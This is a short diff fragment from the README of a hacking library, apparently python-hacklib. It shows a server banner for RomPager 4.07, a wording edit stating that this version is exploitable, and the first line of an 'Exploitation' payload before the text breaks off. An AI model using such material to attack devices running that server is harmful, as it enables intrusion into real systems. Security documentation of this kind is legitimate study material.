lazorfuzz/python-hacklib/README.md

 Transfer-Encoding: chunked
 Server: RomPager/4.07 UPnP/1.0
 EXT:
-# The banner for port 80 shows us that the server uses RomPager/4.07.
-This is exploitable.
+# The banner for port 80 shows us that the server uses RomPager 4.07.
+This version is exploitable.

 # Exploitation
 >>> payload = '''GET /HTTP/1.1